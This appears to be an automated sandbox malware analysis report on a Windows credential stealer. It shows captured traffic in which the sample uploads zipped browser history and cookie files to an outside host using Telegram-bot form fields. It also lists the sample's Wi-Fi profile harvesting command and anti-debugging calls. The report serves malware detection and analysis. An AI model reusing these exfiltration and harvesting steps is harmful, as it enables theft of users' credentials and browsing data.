                                                                                              2024-05-08 11:54:50 UTC760INData Raw: 64 37 38 0d 0a 48 34 73 49 41 41 41 41 41 41 41 41 41 38 78 64 42 33 77 55 78 66 66 66 35 43 36 58 35 46 49 76 6c 35 36 51 79 34 4b 45 49 2f 53 65 30 48 74 48 70 43 66 53 51 58 6f 35 49 50 51 53 67 6e 51 55 42 45 46 41 6b 43 35 46 6b 4b 6f 30 55 52 46 51 45 55 57 77 67 7a 51 56 56 43 77 49 32 45 45 52 2f 76 50 6d 62 6e 66 6e 64 6e 62 33 64 75 66 75 46 2f 35 2b 35 4a 75 37 75 5a 32 33 62 39 36 38 65 54 4d 37 2b 39 36 62 64 6f 38 76 35 6b 77 63 78 35 6e 52 76 77 63 50 4f 4f 34 51 35 2f 36 76 49 65 66 37 76 79 4c 30 4c 39 72 78 57 6a 54 33 61 76 69 48 2f 4b 47 67 74 68 2f 79 6e 51 63 50 4b 63 67 63 4e 63 59 31 61 45 7a 66 45 5a 6e 39 2b 34 34 63 36 52 71 62 32 57 39 41 35 70 68 78 49 7a 4f 48 6a 4d 78 73 32 72 35 54 35 67 6a 58 45 77 4d 71 52 6b 56 5a 48 2f
                                                                                              Data Ascii: d78H4sIAAAAAAAAA8xdB3wUxfff5C6X5FIvl56Qy4KEI/Se0HtHpCfSQXo5IPQSgnQUBEFAkC5FkKo0URFQEUWwgzQVVCwI2EER/vPmbnfndnb3dufuF/5+5Ju7uZ23b968eTM7+96bdo8v5kwcx5nRvwcPOO4Q5/6vIef7vyL0L9rxWjT3aviH/KGgth/ynQcPKcgcNcY1aEzfEZn9+44c6Rqb2W9A5phxIzOHjMxs2r5T5gjXEwMqRkVZH/
                                                                                              2024-05-08 11:54:50 UTC1369INData Raw: 55 44 5a 66 7a 51 57 56 33 64 69 4f 75 71 72 73 37 76 54 5a 31 31 55 41 50 30 30 53 62 52 59 59 54 7a 49 6a 68 53 47 41 34 32 76 53 78 31 50 69 33 49 72 36 6e 36 53 7a 6e 78 7a 62 74 56 59 65 34 32 2b 63 33 7a 4b 32 6f 71 7a 4b 43 70 38 51 41 76 5a 4c 42 70 6d 6b 78 62 6b 6c 4d 69 52 55 4b 59 6a 30 46 4e 71 48 41 35 69 6d 49 45 77 72 77 68 7a 6b 45 71 33 7a 62 4e 30 2b 31 70 54 75 43 58 2f 44 65 69 37 46 53 63 62 7a 58 72 31 30 54 6c 62 72 32 55 5a 4d 35 65 45 6f 69 6f 75 39 73 47 6f 4b 6b 58 51 4c 4b 46 70 6d 43 70 79 53 68 6f 6a 47 6c 73 72 68 52 5a 6d 63 75 4b 67 75 65 6b 75 78 39 7a 58 69 43 47 31 71 47 79 2f 6d 4a 70 33 74 50 49 71 54 79 39 34 7a 35 76 52 54 34 6e 64 6e 65 48 71 4c 47 37 78 79 2b 39 74 32 53 50 61 52 66 36 62 76 4d 34 61 65 65 7a 79
                                                                                              Data Ascii: UDZfzQWV3diOuqrs7vTZ11UAP00SbRYYTzIjhSGA42vSx1Pi3Ir6n6SznxzbtVYe42+c3zK2oqzKCp8QAvZLBpmkxbklMiRUKYj0FNqHA5imIEwrwhzkEq3zbN0+1pTuCX/Dei7FScbzXr10Tlbr2UZM5eEoiou9sGoKkXQLKFpmCpyShojGlsrhRZmcuKguekux9zXiCG1qGy/mJp3tPIqTy94z5vRT4ndneHqLG7xy+9t2SPaRf6bvM4aeezy
                                                                                              2024-05-08 11:54:50 UTC1326INData Raw: 45 51 79 2f 79 54 55 41 66 53 31 64 47 33 51 68 4b 7a 37 62 4e 54 41 49 6a 4c 65 70 4e 6a 79 55 78 4b 4e 36 67 2b 42 37 6f 69 6e 2b 76 67 6c 47 31 70 71 31 5a 44 63 55 66 6d 6b 70 53 37 43 6d 59 49 43 6e 33 2b 69 66 49 56 31 52 2b 43 64 69 70 75 67 44 7a 36 78 31 57 70 69 31 54 6e 73 4b 50 68 51 4b 50 76 51 55 6e 42 45 4b 7a 6e 67 4b 7a 67 6f 46 5a 7a 30 46 48 77 6b 46 48 33 6e 57 2b 33 66 6a 30 65 49 65 2f 66 43 78 38 4d 50 48 6e 69 73 2f 45 51 6f 2b 38 52 52 38 4b 68 54 67 44 77 65 43 54 63 34 56 49 41 67 75 73 38 39 50 71 50 76 7a 45 76 4e 64 6b 2b 48 37 32 4a 66 52 79 6f 67 6f 58 42 6d 45 31 39 66 4f 78 36 47 74 74 59 4f 64 7a 36 50 76 69 4d 68 6e 51 4b 52 71 38 42 54 34 36 31 6f 56 68 43 63 4a 39 35 66 56 35 4a 63 58 79 43 2f 4c 4f 65 4c 4c 47 76 69
                                                                                              Data Ascii: EQy/yTUAfS1dG3QhKz7bNTAIjLepNjyUxKN6g+B7oin+vglG1pq1ZDcUfmkpS7CmYICn3+ifIV1R+CdipugDz6x1Wpi1TnsKPhQKPvQUnBEKzngKzgoFZz0FHwkFH3nW+3fj0eIe/fCx8MPHnis/EQo+8RR8KhTgDweCTc4VIAgus89PqPvzEvNdk+H72JfRyogoXBmE19fOx6GttYOdz6PviMhnQKRq8BT461oVhCcJ95fV5JcXyC/LOeLLGvi
                                                                                              2024-05-08 11:54:50 UTC1369INData Raw: 33 63 30 33 0d 0a 58 4e 69 41 7a 30 36 78 68 36 47 76 61 45 57 59 43 7a 4e 65 49 61 70 72 64 71 49 57 57 47 76 44 38 32 59 79 2f 6a 48 52 63 79 32 58 68 4c 2b 6d 6f 4b 2b 77 45 73 33 42 73 41 64 78 7a 42 55 6b 51 32 4d 74 53 55 6b 46 4b 62 69 35 7a 6c 52 34 65 72 5a 77 73 4c 4d 4b 59 41 65 49 42 30 67 41 53 41 51 49 41 6b 42 32 77 2b 70 43 30 36 55 31 4d 6a 54 4d 55 79 73 55 79 70 4d 41 6b 67 46 53 41 46 49 39 31 38 70 72 34 54 31 42 46 2b 6f 47 61 78 54 6d 33 45 4d 69 44 43 35 4b 35 39 78 37 68 68 5a 6e 42 6f 41 44 49 46 4f 42 42 50 72 42 47 68 72 75 79 6f 54 33 46 75 37 71 34 58 41 42 44 31 41 53 6f 42 54 41 49 77 43 6c 56 54 68 77 6f 76 6e 47 51 6a 4a 67 68 57 75 79 41 4d 6f 41 4f 41 48 4b 41 6d 54 72 59 69 41 43 4c 69 67 48 55 42 36 67 41 6b 42 46 67
                                                                                              Data Ascii: 3c03XNiAz06xh6GvaEWYCzNeIaprdqIWWGvD82Yy/jHRcy2XhL+moK+wEs3BsAdxzBUkQ2MtSUkFKbi5zlR4erZwsLMKYAeIB0gASAQIAkB2w+pC06U1MjTMUysUypMAkgFSAFI918pr4T1BF+oGaxTm3EMiDC5K59x7hhZnBoADIFOBBPrBGhruyoT3Fu7q4XABD1ASoBTAIwClVThwovnGQjJghWuyAMoAOAHKAmTrYiACLigHUB6gAkBFg
                                                                                              2024-05-08 11:54:50 UTC1369INData Raw: 74 47 41 30 74 73 47 62 72 48 68 4f 55 7a 4f 69 75 6f 4c 75 4c 37 67 71 78 62 62 30 6c 53 66 73 65 53 2f 72 37 34 70 44 51 46 2b 4f 37 4c 53 4a 32 6d 2f 68 6c 34 2b 73 53 47 30 68 45 66 39 43 43 70 58 75 49 46 6a 58 56 5a 33 4c 5a 69 2b 33 73 49 2f 57 68 33 76 35 59 36 78 6e 58 77 6b 50 62 2f 73 6e 37 4a 79 69 4f 5a 33 70 67 55 75 4e 5a 50 6c 4a 46 76 76 70 4b 34 35 73 32 43 2f 72 48 38 79 70 76 58 72 31 30 52 38 50 75 2b 44 59 70 49 71 50 39 4a 45 61 70 31 75 6e 6e 6b 39 48 75 36 37 45 33 36 74 61 6b 76 35 61 64 5a 39 66 78 34 35 36 32 38 48 66 4b 6c 7a 41 54 69 6b 47 31 52 32 54 6b 43 59 6b 52 2b 57 31 31 74 49 63 57 41 69 30 6f 66 2b 61 78 31 7a 7a 74 69 56 64 72 42 38 30 41 78 61 4f 38 57 52 71 57 5a 34 43 57 35 66 47 6e 48 66 41 71 4e 30 7a 53 4d 61
                                                                                              Data Ascii: tGA0tsGbrHhOUzOiuoLuL7gqxbb0lSfseS/r74pDQF+O7LSJ2m/hl4+sSG0hEf9CCpXuIFjXVZ3LZi+3sI/Wh3v5Y6xnXwkPb/sn7JyiOZ3pgUuNZPlJFvvpK45s2C/rH8ypvXr10R8Pu+DYpIqP9JEap1unnk9Hu67E36takv5adZ9fx45628HfKlzATikG1R2TkCYkR+W11tIcWAi0of+ax1zztiVdrB80AxaO8WRqWZ4CW5fGnHfAqN0zSMa
                                                                                              2024-05-08 11:54:50 UTC1369INData Raw: 48 50 62 70 76 50 48 78 45 6e 33 6d 4e 61 78 41 54 78 67 72 51 34 38 64 5a 58 6a 65 64 37 52 56 6f 2f 64 35 46 65 34 4a 42 6e 72 69 6d 6d 51 35 35 37 57 50 4c 72 36 48 31 64 6a 72 46 7a 63 30 42 32 72 73 6b 4d 75 33 31 66 33 5a 36 78 66 48 61 71 32 58 53 74 55 6e 64 4c 4e 54 7a 71 46 61 78 74 76 4f 5a 62 34 46 59 2b 41 74 33 50 64 76 6b 57 4e 41 72 71 74 2f 66 66 37 70 55 4f 50 30 48 53 37 4b 6a 72 57 77 58 43 65 4d 43 70 4d 64 67 39 63 30 6d 63 39 67 6e 70 39 52 30 6c 65 42 35 33 6c 33 39 38 59 78 38 42 79 76 59 71 2b 4d 72 73 66 4b 43 33 53 45 39 78 34 4b 61 7a 75 74 39 78 35 36 4e 73 5a 31 37 4d 71 4c 4b 6a 70 49 2f 51 57 45 2f 76 31 31 30 53 5a 4d 4f 5a 68 42 42 47 34 78 50 78 65 4a 7a 39 37 66 6e 35 6c 4a 7a 44 30 73 63 33 49 36 70 57 73 31 79 76 52
                                                                                              Data Ascii: HPbpvPHxEn3mNaxATxgrQ48dZXjed7RVo/d5Fe4JBnrimmQ557WPLr6H1djrFzc0B2rskMu31f3Z6xfHaq2XStUndLNTzqFaxtvOZb4FY+At3PdvkWNArqt/ff7pUOP0HS7KjrWwXCeMCpMdg9c0mc9gnp9R0leB53l398Yx8ByvYq+MrsfKC3SE9x4Kazut9x56NsZ17MqLKjpI/QWE/v110SZMOZhBBG4xPxeJz97fn5lJzD0sc3I6pWs1yvR
                                                                                              2024-05-08 11:54:50 UTC1369INData Raw: 54 64 38 4f 5a 45 77 67 65 43 64 76 67 58 64 47 70 48 56 70 39 52 5a 31 65 47 72 72 5a 66 33 43 2b 68 37 42 4d 6a 65 47 6c 32 43 59 4e 70 4c 39 72 45 35 65 7a 44 2f 73 64 36 37 4c 37 47 6f 52 4f 54 32 61 54 65 33 55 4f 62 64 53 69 67 68 2b 59 66 76 58 74 78 43 67 53 77 77 41 34 71 38 4a 51 4d 6c 33 71 32 47 45 71 4b 52 38 42 55 48 5a 55 69 74 42 42 63 6f 57 33 53 32 62 50 2f 6a 6c 5a 66 2f 71 61 54 63 54 72 2f 6e 47 33 45 66 61 49 46 74 4c 2b 46 54 59 33 52 76 4f 49 61 69 64 36 2f 44 4b 30 53 43 46 4b 50 37 48 39 4d 43 74 48 66 58 57 32 32 50 65 58 44 65 4b 30 51 73 73 57 35 36 4c 64 54 6f 50 58 57 78 53 57 4d 47 65 71 32 6f 64 7a 65 46 47 2b 59 50 6b 51 6a 78 70 31 65 62 6b 6f 7a 54 35 54 49 68 4e 67 52 44 48 73 5a 38 2b 5a 34 61 75 66 35 37 5a 6c 4a 4e
                                                                                              Data Ascii: Td8OZEwgeCdvgXdGpHVp9RZ1eGrrZf3C+h7BMjeGl2CYNpL9rE5ezD/sd67L7GoROT2aTe3UObdSigh+YfvXtxCgSwwA4q8JQMl3q2GEqKR8BUHZUitBBcoW3S2bP/jlZf/qaTcTr/nG3EfaIFtL+FTY3RvOIaid6/DK0SCFKP7H9MCtHfXW22PeXDeK0QssW56LdToPXWxSWMGeq2odzeFG+YPkQjxp1ebkozT5TIhNgRDHsZ8+Z4auf57ZlJN
                                                                                              2024-05-08 11:54:50 UTC1369INData Raw: 7a 77 72 74 5a 45 39 5a 70 77 56 55 2b 41 58 67 43 39 41 66 6f 41 39 4b 57 72 75 32 74 30 54 65 44 63 75 63 70 63 62 51 42 49 59 72 57 67 54 6a 2b 41 2f 67 42 50 41 41 77 41 47 4b 68 47 72 4c 55 36 73 52 79 6f 4d 77 68 67 4d 4d 41 51 67 4b 45 41 77 39 53 49 35 61 67 54 79 34 55 36 77 77 46 47 41 49 77 45 63 41 47 4d 30 69 57 6c 32 6e 44 56 61 49 41 78 41 41 55 41 59 77 48 47 71 66 48 53 57 5a 32 58 4f 6c 42 6e 50 4d 41 45 67 49 6b 41 6b 77 41 6d 71 78 46 72 71 55 36 73 4c 74 53 5a 41 6a 41 56 59 42 70 41 49 63 42 30 4e 57 4b 31 31 59 6e 56 67 7a 70 46 41 44 4d 41 6e 67 53 59 43 54 42 4c 6a 56 68 4e 64 57 4c 31 6f 63 35 73 67 44 6b 41 63 77 48 6d 41 63 78 58 49 31 5a 58 6e 56 67 44 71 4c 4d 41 34 43 6d 41 70 77 45 57 41 69 78 53 49 39 5a 52 6e 56 68 44 71
                                                                                              Data Ascii: zwrtZE9ZpwVU+AXgC9AfoA9KWru2t0TeDcucpcbQBIYrWgTj+A/gBPAAwAGKhGrLU6sRyoMwhgMMAQgKEAw9SI5agTy4U6wwFGAIwEcAGM0iWl2nDVaIAxAAUAYwHGqfHSWZ2XOlBnPMAEgIkAkwAmqxFrqU6sLtSZAjAVYBpAIcB0NWK11YnVgzpFADMAngSYCTBLjVhNdWL1oc5sgDkAcwHmAcxXI1ZXnVgDqLMA4CmApwEWAixSI9ZRnVhDq
                                                                                              2024-05-08 11:54:50 UTC1369INData Raw: 6d 43 36 4f 72 32 65 43 69 47 4f 49 69 71 77 4c 74 57 4c 6a 49 53 6c 77 55 7a 4e 45 58 52 63 42 46 64 75 4b 69 62 44 4e 39 55 54 79 36 4b 49 56 6f 37 51 41 72 64 55 30 71 30 41 6b 6e 36 4a 79 6d 4a 65 4b 77 77 6b 55 52 78 45 57 6f 41 36 69 4c 49 74 46 46 71 63 54 4e 6c 67 56 54 31 36 51 42 6e 55 69 43 54 70 49 43 30 31 48 6f 6f 67 7a 69 6d 73 73 4b 44 49 55 44 6f 57 68 30 55 57 57 34 71 42 44 31 75 37 6c 30 62 66 41 62 79 43 71 45 38 77 58 76 57 78 59 4a 4e 79 39 64 42 44 38 53 56 57 4f 67 4b 6d 67 55 75 48 70 61 58 46 31 67 35 44 6d 53 55 47 45 36 77 58 73 54 75 6e 30 6c 6f 4a 36 4e 34 47 75 48 41 75 39 78 63 46 47 38 79 4a 65 46 34 6d 75 78 78 4a 66 46 6d 36 38 45 71 42 70 46 30 47 38 59 53 74 4f 50 52 68 66 42 43 4b 36 45 79 5a 73 6f 38 67 73 6c 38 69
                                                                                              Data Ascii: mC6Or2eCiGOIiqwLtWLjISlwUzNEXRcBFduKibDN9UTy6KIVo7QArdU0q0Akn6JymJeKwwkURxEWoA6iLItFFqcTNlgVT16QBnUiCTpIC01HoogzimssKDIUDoWh0UWW4qBD1u7l0bfAbyCqE8wXvWxYJNy9dBD8SVWOgKmgUuHpaXF1g5DmSUGE6wXsTun0loJ6N4GuHAu9xcFG8yJeF4muxxJfFm68EqBpF0G8YStOPRhfBCK6EyZso8gsl8i
                                                                                              2024-05-08 11:54:50 UTC1369INData Raw: 49 78 42 76 30 6c 30 53 45 64 50 7a 71 75 38 4f 38 38 63 4f 2f 2b 59 5a 55 2f 7a 52 33 48 48 39 70 59 62 77 65 31 70 32 64 43 6d 4f 4b 37 6c 65 36 78 68 6e 39 4f 44 51 38 7a 77 68 43 72 43 48 4e 4d 79 55 42 70 46 2f 7a 78 6e 69 58 75 72 69 63 30 6e 45 79 62 69 30 62 57 63 37 49 30 56 6a 2b 36 47 6e 2b 71 61 50 48 38 2f 6b 7a 54 67 36 2f 75 37 6f 6f 61 62 45 4d 56 6d 36 59 32 54 61 43 7a 45 79 43 6d 63 70 47 4d 36 39 70 5a 61 33 4e 56 42 6e 56 71 6a 6c 38 67 78 41 33 6c 45 36 68 2b 30 65 61 31 30 46 58 64 48 4e 4b 38 53 6e 59 4d 6a 44 53 4f 65 54 4b 4a 76 54 6b 6f 6a 31 4d 5a 78 50 59 68 44 49 34 6e 6c 4d 2f 33 6c 4f 49 39 62 7a 31 47 47 57 38 79 6f 63 66 62 54 69 55 78 2f 77 2b 51 32 4e 30 2b 51 79 49 59 34 49 51 78 35 47 72 58 4d 38 44 4d 74 37 43 73 68
                                                                                              Data Ascii: IxBv0l0SEdPzqu8O88cO/+YZU/zR3HH9pYbwe1p2dCmOK7le6xhn9ODQ8zwhCrCHNMyUBpF/zxniXuric0nEybi0bWc7I0Vj+6Gn+qaPH8/kzTg6/u7ooabEMVm6Y2TaCzEyCmcpGM69pZa3NVBnVqjl8gxA3lE6h+0ea10FXdHNK8SnYMjDSOeTKJvTkoj1MZxPYhDI4nlM/3lOI9bz1GGW8yocfbTiUx/w+Q2N0+QyIY4IQx5GrXM8DMt7Csh


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.449733172.67.143.2454436516C:\Users\user\Desktop\14posdLrGh.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-08 11:54:54 UTC202OUTPOST /API/FETCH/getcountry.php HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=---TelegramBotAPI_638507840859530506
                                                                                              Host: whatismyipaddressnow.co
                                                                                              Content-Length: 5314
                                                                                              Connection: Keep-Alive
                                                                                              2024-05-08 11:54:54 UTC1024OUTData Raw: 2d 2d 2d 2d 2d 54 65 6c 65 67 72 61 6d 42 6f 74 41 50 49 5f 36 33 38 35 30 37 38 34 30 38 35 39 35 33 30 35 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 51 56 5a 54 63 6d 56 47 51 30 45 78 61 48 56 30 4c 33 46 76 5a 32 46 68 64 55 74 46 64 7a 30 39 0d 0a 2d 2d 2d 2d 2d 54 65 6c 65 67 72 61 6d 42 6f 74 41 50 49 5f 36 33 38 35 30 37 38 34 30 38 35 39 35 33 30 35 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 53 57 68 55 59 6e 4a 4c 51 57 5a 4d 53 6e 6c 72 64 6b 6f 33 62 6d 31 44 63 30 39 68 4f 54 63 30 64 48 68 6a 4d 58 46 53 61 55 46
                                                                                              Data Ascii: -----TelegramBotAPI_638507840859530506Content-Disposition: form-data; name="chat_id"QVZTcmVGQ0ExaHV0L3FvZ2FhdUtFdz09-----TelegramBotAPI_638507840859530506Content-Disposition: form-data; name="token"SWhUYnJLQWZMSnlrdko3bm1Dc09hOTc0dHhjMXFSaUF
                                                                                              2024-05-08 11:54:54 UTC4246OUTData Raw: 08 00 98 85 a8 58 07 5c 14 df 75 00 00 00 b2 00 00 00 11 00 00 00 47 65 63 6b 6f 2f 48 69 73 74 6f 72 79 2e 74 78 74 b3 b5 45 00 b7 cc a2 d4 b4 fc 0a 5b 14 c0 cb 15 92 59 92 93 6a a5 00 95 55 08 28 ca 2c 4b 4c ae 54 f0 cb 2f c9 4c 4e 55 78 d4 30 45 c1 37 bf 2a 33 27 27 91 97 2b b4 28 c7 4a 21 a3 a4 a4 a0 d8 4a 5f bf bc bc 5c 2f 17 22 a3 97 5f 94 ae 9f 9a a7 1b 1a ac 5f 00 d1 ae 9f 06 31 4e 9f 97 2b 2c b3 38 b3 44 c1 39 bf 34 af c4 4a c1 90 97 cb 16 1f e0 e5 02 00 50 4b 03 04 14 00 00 00 08 00 98 85 a8 58 bb 9a 2a 93 ed 06 00 00 22 10 00 00 14 00 00 00 43 68 72 6f 6d 69 75 6d 2f 43 6f 6f 6b 69 65 73 2e 74 78 74 cd 57 cb 8e a3 48 16 5d d3 52 ff 46 6d 2c 32 09 22 02 22 16 b9 e0 ed 07 d8 18 fc c0 de a4 00 83 8d c1 60 1e 06 db 1a d5 b7 0f e5 ea ae ee 1e d5 54
                                                                                              Data Ascii: X\uGecko/History.txtE[YjU(,KLT/LNUx0E7*3''+(J!J_\/"__1N+,8D94JPKX*"Chromium/Cookies.txtWH]RFm,2""`T
                                                                                              2024-05-08 11:54:54 UTC44OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 54 65 6c 65 67 72 61 6d 42 6f 74 41 50 49 5f 36 33 38 35 30 37 38 34 30 38 35 39 35 33 30 35 30 36 2d 2d 0d 0a
                                                                                              Data Ascii: -----TelegramBotAPI_638507840859530506--
                                                                                              2024-05-08 11:54:56 UTC574INHTTP/1.1 200 OK
                                                                                              Date: Wed, 08 May 2024 11:54:56 GMT
                                                                                              Content-Type: application/json
                                                                                              Content-Length: 20
                                                                                              Connection: close
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FpUZuKgZRxBZkuTuSJpIDGxklv5IGuoR2qtylhcp47JlvRTY3W5NgKYZGI2KPL5E54zlppgQKuGARb2hFvsyGf3GBbEUjfoGR%2BH4eCI%2F5HoqR3RhHcRjfHh8pSQu8v8Ls7jfw4ba1%2BVVNA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 880941f8eab7eb83-SEA
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-05-08 11:54:56 UTC20INData Raw: 43 6f 75 6e 74 72 79 20 6e 6f 74 20 64 65 66 69 6e 65 64 2e
                                                                                              Data Ascii: Country not defined.


                                                                                              Statistics

                                                                                              CPU Usage

                                                                                              Click to jump to process

                                                                                              Memory Usage

                                                                                              Click to jump to process

                                                                                              High Level Behavior Distribution

                                                                                              Click to dive into process behavior distribution

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              General

                                                                                              Target ID:0
                                                                                              Start time:13:54:47
                                                                                              Start date:08/05/2024
                                                                                              Path:C:\Users\user\Desktop\14posdLrGh.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\14posdLrGh.exe"
                                                                                              Imagebase:0x900000
                                                                                              File size:50'176 bytes
                                                                                              MD5 hash:B10B3047A2A4A6D75DDB3633906F2613
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_PXRECVOWEIWOEI, Description: Yara detected PXRECVOWEIWOEI Stealer, Source: 00000000.00000002.1677581277.0000000002919000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1677581277.00000000024D7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:1
                                                                                              Start time:13:54:50
                                                                                              Start date:08/05/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:2
                                                                                              Start time:13:54:50
                                                                                              Start date:08/05/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:3
                                                                                              Start time:13:54:50
                                                                                              Start date:08/05/2024
                                                                                              Path:C:\Windows\SysWOW64\chcp.com
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:chcp 65001
                                                                                              Imagebase:0xdd0000
                                                                                              File size:12'800 bytes
                                                                                              MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:4
                                                                                              Start time:13:54:50
                                                                                              Start date:08/05/2024
                                                                                              Path:C:\Windows\SysWOW64\netsh.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:netsh wlan show profile
                                                                                              Imagebase:0x1560000
                                                                                              File size:82'432 bytes
                                                                                              MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:5
                                                                                              Start time:13:54:50
                                                                                              Start date:08/05/2024
                                                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:findstr All
                                                                                              Imagebase:0xe20000
                                                                                              File size:29'696 bytes
                                                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:6
                                                                                              Start time:13:54:50
                                                                                              Start date:08/05/2024
                                                                                              Path:C:\Windows\System32\msiexec.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                              Imagebase:0x7ff7f8960000
                                                                                              File size:69'632 bytes
                                                                                              MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Disassembly

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:10.9%
                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                Signature Coverage:3.7%
                                                                                                Total number of Nodes:189
                                                                                                Total number of Limit Nodes:34
                                                                                                execution_graph 112913 885648 112914 88564e 112913->112914 112915 8856a0 112914->112915 112917 8856d9 112914->112917 112918 8856ed 112917->112918 112919 88571b 112918->112919 112922 886200 112918->112922 112927 8861f0 112918->112927 112919->112914 112924 886205 112922->112924 112923 88628b 112923->112918 112924->112923 112925 57a6f38 CheckRemoteDebuggerPresent 112924->112925 112926 57a6f28 CheckRemoteDebuggerPresent 112924->112926 112925->112924 112926->112924 112928 886205 112927->112928 112929 88628b 112928->112929 112930 57a6f38 CheckRemoteDebuggerPresent 112928->112930 112931 57a6f28 CheckRemoteDebuggerPresent 112928->112931 112929->112918 112930->112928 112931->112928 112932 57aaca8 112934 57aacc2 112932->112934 112933 57aadbb 112934->112933 112951 5d0c780 112934->112951 112956 5d0c770 112934->112956 112961 5cf20b8 112934->112961 112965 5cf20a8 112934->112965 112969 5cf8988 112934->112969 112973 5cf8998 112934->112973 112977 5cf94b8 112934->112977 112981 5cf94c8 112934->112981 112985 5cf9da3 112934->112985 112989 5cf9d73 112934->112989 112994 5cf9db0 112934->112994 112998 5cfb728 112934->112998 113002 5cfb738 112934->113002 113006 5cfc788 112934->113006 113010 5cfc77b 112934->113010 113014 59d1cf9 112934->113014 112953 5d0c785 112951->112953 112952 5d0cc9b 112952->112934 112953->112952 113018 5cf0700 112953->113018 113024 5cf06d8 112953->113024 112958 5d0c780 112956->112958 112957 5d0cc9b 112957->112934 112958->112957 112959 5cf06d8 2 API calls 112958->112959 112960 5cf0700 2 API calls 112958->112960 112959->112958 112960->112958 112964 5cf20bd 112961->112964 112962 5cf2c07 112962->112934 112963 5cf0700 2 API calls 112963->112964 112964->112962 112964->112963 112968 5cf20b8 112965->112968 112966 5cf2c07 112966->112934 112967 5cf0700 2 API calls 112967->112968 112968->112966 112968->112967 112972 5cf89c2 112969->112972 112970 5cf9062 112970->112934 112971 5cf0700 2 API calls 112971->112972 112972->112970 112972->112971 112976 5cf89c2 112973->112976 112974 5cf9062 112974->112934 112975 5cf0700 2 API calls 112975->112976 112976->112974 112976->112975 112978 5cf94c8 112977->112978 112979 5cf976e 112978->112979 112980 5cf0700 2 API calls 112978->112980 112979->112934 112980->112978 112984 5cf94cd 112981->112984 112982 5cf976e 112982->112934 112983 5cf0700 2 API calls 112983->112984 112984->112982 112984->112983 112987 5cf9db0 112985->112987 112986 5cfa24e 112986->112934 112987->112986 112988 5cf0700 2 API calls 112987->112988 112988->112987 112990 5cf9d7a 112989->112990 112993 5cf9ddd 112989->112993 112990->112934 112991 5cfa24e 112991->112934 112992 5cf0700 2 API calls 112992->112993 112993->112991 112993->112992 112997 5cf9db5 112994->112997 112995 5cfa24e 112995->112934 112996 5cf0700 2 API calls 112996->112997 112997->112995 112997->112996 113000 5cfb738 112998->113000 112999 5cfbb0d 112999->112934 